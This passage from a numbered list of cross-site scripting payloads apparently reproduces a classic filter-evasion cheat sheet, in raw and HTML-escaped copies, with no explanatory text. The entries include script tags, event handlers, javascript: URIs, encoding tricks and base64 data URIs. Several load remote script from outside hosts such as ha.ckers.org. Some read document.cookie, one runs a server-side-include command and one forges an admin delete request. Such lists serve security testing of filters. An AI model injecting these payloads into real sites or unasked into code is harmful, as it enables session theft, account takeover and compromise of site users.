  740. ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  741. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  742. '';!--"<XSS>=&{()}
  743. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  744. <IMG SRC="javascript:alert('XSS');">
  745. <IMG SRC=javascript:alert('XSS')>
  746. <IMG SRC=javascrscriptipt:alert('XSS')>
  747. <IMG SRC=JaVaScRiPt:alert('XSS')>
  748. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  749. <IMG SRC=" &#14; javascript:alert('XSS');">
  750. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  751. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  752. <<SCRIPT>alert("XSS");//<</SCRIPT>
  753. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  754. \";alert('XSS');//
  755. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  756. ¼script¾alert(¢XSS¢)¼/script¾
  757. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  758. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  759. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  760. <TABLE BACKGROUND="javascript:alert('XSS')">
  761. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  762. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  763. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  764. <DIV STYLE="width: expression(alert('XSS'));">
  765. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  766. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  767. <XSS STYLE="xss:expression(alert('XSS'))">
  768. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  769. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  770. a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  771. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  772. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  773. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  774. <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  775. <form><button formaction="javascript:alert(123)">crosssitespt
  776. <frameset onload=alert(123)>
  777. <!--<img src="--><img src=x onerror=alert(123)//">
  778. <style><img src="</style><img src=x onerror=alert(123)//">
  779. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  780. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  781. <embed src="javascript:alert(1)">
  782. <? foo="><script>alert(1)</script>">
  783. <! foo="><script>alert(1)</script>">
  784. </ foo="><script>alert(1)</script>">
  785. <script>({0:#0=alert/#0#/#0#(123)})</script>
  786. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  787. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  788. <script src="#">{alert(1)}</script>;1
  789. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  790. <svg xmlns="#"><script>alert(1)</script></svg>
  791. <svg onload="javascript:alert(123)" xmlns="#"></svg>
  792. <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  793. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  794. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  795. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  796. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  797. %253cscript%253ealert(document.cookie)%253c/script%253e
  798. “><s”%2b”cript>alert(document.cookie)</script>
  799. “><ScRiPt>alert(document.cookie)</script>
  800. “><<script>alert(document.cookie);//<</script>
  801. foo%00<script>alert(document.cookie)</script>
  802. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  803. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  804. ‘; alert(document.cookie); var foo=’
  805. foo\’; alert(document.cookie);//’;
  806. </script><script >alert(document.cookie)</script>
  807. <img src=asdf onerror=alert(document.cookie)>
  808. <BODY ONLOAD=alert(’XSS’)>
  809. <script>alert(1)</script>
  810. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  811. <video src=1 onerror=alert(1)>
  812. <audio src=1 onerror=alert(1)>
  813. <script>alert(123)</script>
  814. <script>alert("hellox worldss");</script>
  815. javascript:alert("hellox worldss")
  816. <img src="javascript:alert('XSS');">
  817. <img src=javascript:alert(&quot;XSS&quot;)>
  818. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  819. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  820. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  821. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  822. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  823. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  824. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  825. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  826. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  827. <<SCRIPT>alert("XSS");//<</SCRIPT>
  828. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  829. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  830. <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  831. <script>alert("XSS");</script>&search=1
  832. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  833. <h1><font color=blue>hellox worldss</h1>
  834. <BODY ONLOAD=alert('hellox worldss')>
  835. <input onfocus=write(XSS) autofocus>
  836. <input onblur=write(XSS) autofocus><input autofocus>
  837. <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  838. <form><button formaction="javascript:alert(XSS)">lol
  839. <!--<img src="--><img src=x onerror=alert(XSS)//">
  840. <![><img src="]><img src=x onerror=alert(XSS)//">
  841. <style><img src="</style><img src=x onerror=alert(XSS)//">
  842. <? foo="><script>alert(1)</script>">
  843. <! foo="><script>alert(1)</script>">
  844. </ foo="><script>alert(1)</script>">
  845. <? foo="><x foo='?><script>alert(1)</script>'>">
  846. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  847. <% foo><x foo="%><script>alert(123)</script>">
  848. <div style="font-family:'foo&#10;;color:red;';">LOL
  849. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  850. <script>({0:#0=alert/#0#/#0#(0)})</script>
  851. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  852. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  853. \\";alert('XSS');//
  854. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  855. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  856. &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  857. &lt;BODY ONLOAD=alert('XSS')&gt;
  858. &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  859. &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  860. &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  861. &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  862. &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  863. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  864. &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  865. &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  866. &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  867. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  868. &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  869. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  870. &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  871. &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  872. &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  873. žscriptualert(EXSSE)ž/scriptu
  874. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  875. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  876. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  877. &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  878. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  879. &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  880. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  881. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  882. &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  883. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  884. &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  885. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  886. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  887. &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  888. exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  889. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  890. &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  891. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  892. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  893. &lt;!--&#91;if gte IE 4&#93;&gt;
  894. &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  895. &lt;!&#91;endif&#93;--&gt;
  896. &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  897. &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  898. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  899. &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  900. &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  901. a=\"get\";
  902. b=\"URL(\\"\";
  903. c=\"javascript&#058;\";
  904. d=\"alert('XSS');\\")\";
  905. eval(a+b+c+d);
  906. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  907. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  908. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  909. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  910. &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  911. &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  912. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  913. &lt;HTML&gt;&lt;BODY&gt;
  914. &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  915. &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  916. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  917. &lt;/BODY&gt;&lt;/HTML&gt;
  918. &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  919. &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  920. &lt;? echo('&lt;SCR)';
  921. echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  922. &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  923. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  924. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  925. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  926. &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  927. &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  928. &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  929. &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  930. &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  931. &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  932. &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  933. &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  934. &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  935. &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  936. &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  937. &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  938. &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  939. &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  940. &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  941. &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  942. &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  943. &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  944. &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  945. &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  946. &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
  947. &lt;
  948. %3C
  949. &lt
  950. &lt;
  951. &LT
  952. &LT;
  953. &#60
  954. &#060
  955. &#0060
  956. &#00060
  957. &#000060
  958. &#0000060
  959. &lt;
  960. &#x3c
  961. &#x03c
  962. &#x003c
  963. &#x0003c
  964. &#x00003c
  965. &#x000003c
  966. &#x3c;
  967. &#x03c;
  968. &#x003c;
  969. &#x0003c;
  970. &#x00003c;
  971. &#x000003c;
  972. &#X3c
  973. &#X03c
  974. &#X003c
  975. &#X0003c
  976. &#X00003c
  977. &#X000003c
  978. &#X3c;
  979. &#X03c;
  980. &#X003c;
  981. &#X0003c;
  982. &#X00003c;
  983. &#X000003c;
  984. &#x3C
  985. &#x03C
  986. &#x003C
  987. &#x0003C
  988. &#x00003C
  989. &#x000003C
  990. &#x3C;
  991. &#x03C;
  992. &#x003C;
  993. &#x0003C;
  994. &#x00003C;
  995. &#x000003C;
  996. &#X3C
  997. &#X03C
  998. &#X003C
  999. &#X0003C
  1000. &#X00003C
  1001. &#X000003C
  1002. &#X3C;
  1003. &#X03C;
  1004. &#X003C;
  1005. &#X0003C;
  1006. &#X00003C;
  1007. &#X000003C;
  1008. \x3c
  1009. \x3C
  1010. \u003c
  1011. \u003C
  1012. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  1013. &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  1014. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  1015. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  1016. &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  1017. &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1018. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  1019. &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  1020. &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
  1021. perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  1022. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  1023. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  1024. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  1025. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  1026. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  1027. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  1028. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  1029. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  1030. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  1031. &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  1032. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  1033. &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  1034. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  1035. &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  1036. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  1037. '';!--\"&lt;XSS&gt;=&{()}
  1038. ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  1039. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  1040. '';!--"<XSS>=&{()}
  1041. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  1042. <IMG SRC="javascript:alert('XSS');">
  1043. <IMG SRC=javascript:alert('XSS')>
  1044. <IMG SRC=javascrscriptipt:alert('XSS')>
  1045. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1046. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1047. <IMG SRC=" &#14; javascript:alert('XSS');">
  1048. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1049. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1050. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1051. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  1052. \";alert('XSS');//
  1053. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  1054. ŒscriptŸalert(¢XSS¢)Œ/scriptŸ
  1055. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  1056. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  1057. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  1058. <TABLE BACKGROUND="javascript:alert('XSS')">
  1059. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  1060. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  1061. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1062. <DIV STYLE="width: expression(alert('XSS'));">
  1063. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  1064. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  1065. <XSS STYLE="xss:expression(alert('XSS'))">
  1066. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  1067. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  1068. a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  1069. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  1070. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  1071. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  1072. <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  1073. <form><button formaction="javascript:alert(123)">crosssitespt
  1074. <frameset onload=alert(123)>
  1075. <!--<img src="--><img src=x onerror=alert(123)//">
  1076. <style><img src="</style><img src=x onerror=alert(123)//">
  1077. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  1078. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  1079. <embed src="javascript:alert(1)">
  1080. <? foo="><script>alert(1)</script>">
  1081. <! foo="><script>alert(1)</script>">
  1082. </ foo="><script>alert(1)</script>">
